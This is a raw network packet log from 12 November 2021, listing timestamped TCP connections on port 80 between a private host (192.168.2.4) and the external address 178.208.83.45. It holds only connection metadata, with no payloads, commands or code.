                          Nov 12, 2021 22:23:55.668589115 CET4996380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:55.669017076 CET4996280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:55.670794964 CET4996480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:55.690922022 CET8049963178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:55.691034079 CET4996380192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:55.691234112 CET8049962178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:55.691297054 CET4996280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:55.693118095 CET8049964178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:55.697367907 CET4996480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:55.699477911 CET4996480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:55.721834898 CET8049964178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:55.726066113 CET8049964178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:55.726260900 CET4996480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:55.834461927 CET4996480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:55.835640907 CET4996580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:55.857026100 CET8049964178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:55.857106924 CET4996480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:55.857978106 CET8049965178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:55.858105898 CET4996580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:55.874058962 CET4996580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:55.896442890 CET8049965178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:55.900284052 CET8049965178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:55.900367022 CET4996580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.095164061 CET4996580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.097210884 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.098006964 CET4996780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.117726088 CET8049965178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.117815971 CET4996580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.119631052 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.119771957 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.120322943 CET8049967178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.120434999 CET4996780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.120996952 CET4996780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.122304916 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.122387886 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.122561932 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.122642994 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.143385887 CET8049967178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.146756887 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.146785975 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.146796942 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.146825075 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.146842003 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.146981955 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.147020102 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.147094011 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.147104025 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.147113085 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.147126913 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.147139072 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.147156954 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.147195101 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.147229910 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.147306919 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.148557901 CET8049967178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.148674965 CET4996780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.170610905 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.170635939 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.170645952 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.170654058 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.170665979 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.170675993 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.170686960 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.170696020 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.170706987 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.170713902 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.170721054 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.170726061 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.170764923 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.170766115 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.170779943 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.170785904 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.170790911 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.170802116 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.170805931 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.170820951 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.170844078 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.170871019 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.171137094 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.171160936 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.171169996 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.171188116 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.171228886 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.171246052 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.193212032 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.193244934 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.193265915 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.193284035 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.193301916 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.193310022 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.193320990 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.193340063 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.193351984 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.193363905 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.193399906 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.195373058 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195395947 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195415020 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195427895 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195447922 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195467949 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195487022 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195504904 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195522070 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195542097 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195564032 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195576906 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195595026 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195611954 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195630074 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195647955 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195666075 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195686102 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195705891 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195724964 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195743084 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195760012 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195777893 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195796013 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195813894 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195832968 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195851088 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195868969 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195887089 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195904016 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.195923090 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.215780973 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.215847969 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.215867996 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.215883017 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.215899944 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.215964079 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.215982914 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.215998888 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.216017008 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.216033936 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.216049910 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.216065884 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.216103077 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.218765020 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.218882084 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.269233942 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.294565916 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.294650078 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.412348986 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.412750006 CET4996780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.414380074 CET4996880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.434945107 CET8049966178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.434986115 CET8049967178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.435157061 CET4996680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.435208082 CET4996780192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.436779976 CET8049968178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.436961889 CET4996880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.462101936 CET4996880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.484608889 CET8049968178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.487931013 CET8049968178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.488054991 CET4996880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.626787901 CET4996880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.628241062 CET4996980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.649333954 CET8049968178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.649468899 CET4996880192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.650579929 CET8049969178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.650697947 CET4996980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.656429052 CET4996980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.678818941 CET8049969178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.682476044 CET8049969178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.682559967 CET4996980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.806217909 CET4996980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.828216076 CET4997080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.828691006 CET8049969178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.828975916 CET4996980192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.850629091 CET8049970178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.850759983 CET4997080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.855655909 CET4997080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.878063917 CET8049970178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.881656885 CET8049970178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:56.881774902 CET4997080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.992749929 CET4997080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:56.994314909 CET4997180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.005079985 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.015212059 CET8049970178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.015403032 CET4997080192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.016954899 CET8049971178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.017136097 CET4997180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.019174099 CET4997180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.027684927 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.027811050 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.029473066 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.029603958 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.029854059 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.029997110 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.041568041 CET8049971178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.050852060 CET8049971178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.050975084 CET4997180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.052006960 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.052030087 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.052277088 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.052292109 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.052304029 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.052315950 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.052356958 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.052373886 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.052401066 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.052422047 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.052440882 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.052449942 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.052465916 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.052467108 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.052480936 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.052493095 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.052524090 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.052566051 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.074907064 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.074932098 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.075005054 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.075010061 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.075025082 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.075041056 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.075042009 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.075056076 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.075067997 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.075073004 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.075082064 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.075095892 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.075109005 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.075122118 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.075128078 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.075134993 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.075149059 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.075160980 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.075172901 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.075186968 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.075191975 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.075201035 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.075220108 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.075220108 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.075227976 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.075237036 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.075259924 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.075303078 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.097847939 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.097872972 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.097887039 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.097898006 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.097913027 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.097922087 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.097934008 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.097944975 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.097955942 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.097968102 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.097980022 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.097987890 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.097999096 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098001957 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.098006964 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098020077 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098050117 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.098083973 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.098100901 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098115921 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098134041 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098145962 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098156929 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098169088 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098182917 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098196983 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098210096 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098223925 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098258018 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098273039 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098287106 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098299980 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098311901 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098325968 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098339081 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098349094 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098362923 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098375082 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098387003 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098400116 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.098413944 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.120593071 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.120661020 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.120956898 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.120973110 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.120985985 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.120995045 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.121010065 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.121021986 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.121035099 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.121047020 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.121057987 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.121068954 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.121081114 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.121093988 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.123727083 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.123819113 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.161223888 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.186871052 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.187001944 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.359165907 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.359539032 CET4997180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.363253117 CET4997480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.381733894 CET8049972178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.381756067 CET8049971178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.381900072 CET4997280192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.381968021 CET4997180192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.385931969 CET8049974178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.386161089 CET4997480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.408648968 CET4997480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.431330919 CET8049974178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.434689999 CET8049974178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.437570095 CET4997480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.616462946 CET4997480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.618112087 CET4997580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.620322943 CET4997680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.639166117 CET8049974178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.639462948 CET4997480192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.640520096 CET8049975178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.642725945 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.642947912 CET4997580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.642960072 CET4997680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.653404951 CET4997580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.653738022 CET4997680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.653925896 CET4997680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.654236078 CET4997680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.654447079 CET4997680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.676074982 CET8049975178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.676110983 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.676131010 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.676794052 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.676817894 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.676836967 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.676877975 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.676898956 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.676918983 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.676938057 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.676955938 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.676971912 CET4997680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.676975012 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.676995993 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.677040100 CET4997680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.677057028 CET4997680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.677071095 CET4997680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.680387974 CET8049975178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.680599928 CET4997580192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.699419022 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.699448109 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.699460030 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.699471951 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.699485064 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.699497938 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.699511051 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.699520111 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.699528933 CET8049976178.208.83.45192.168.2.4
                          Nov 12, 2021 22:23:57.699536085 CET4997680192.168.2.4178.208.83.45
                          Nov 12, 2021 22:23:57.699537992 CET8049976178.208.83.45192.168.2.4
